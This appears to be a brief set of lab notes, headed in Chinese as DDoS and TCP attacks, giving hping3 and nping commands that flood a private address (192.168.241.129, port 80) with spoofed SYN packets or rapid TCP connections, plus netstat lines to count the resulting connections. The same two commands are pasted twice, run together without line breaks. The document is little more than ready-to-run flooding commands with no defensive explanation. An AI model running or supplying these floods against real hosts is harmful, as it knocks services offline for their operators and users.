DDOS攻击
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.241.129 netstat -na | grep -i syn | wc -l
TCP攻击
nping --tcp-connect --rate=1000 -c 1000 192.168.241.129 -p80 netstat -n | grep -v unix | wc -l
DDOS攻击
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.241.129 netstat -na | grep -i syn | wc -l
TCP攻击
nping --tcp-connect --rate=1000 -c 1000 192.168.241.129 -p80 netstat -n | grep -v unix | wc -l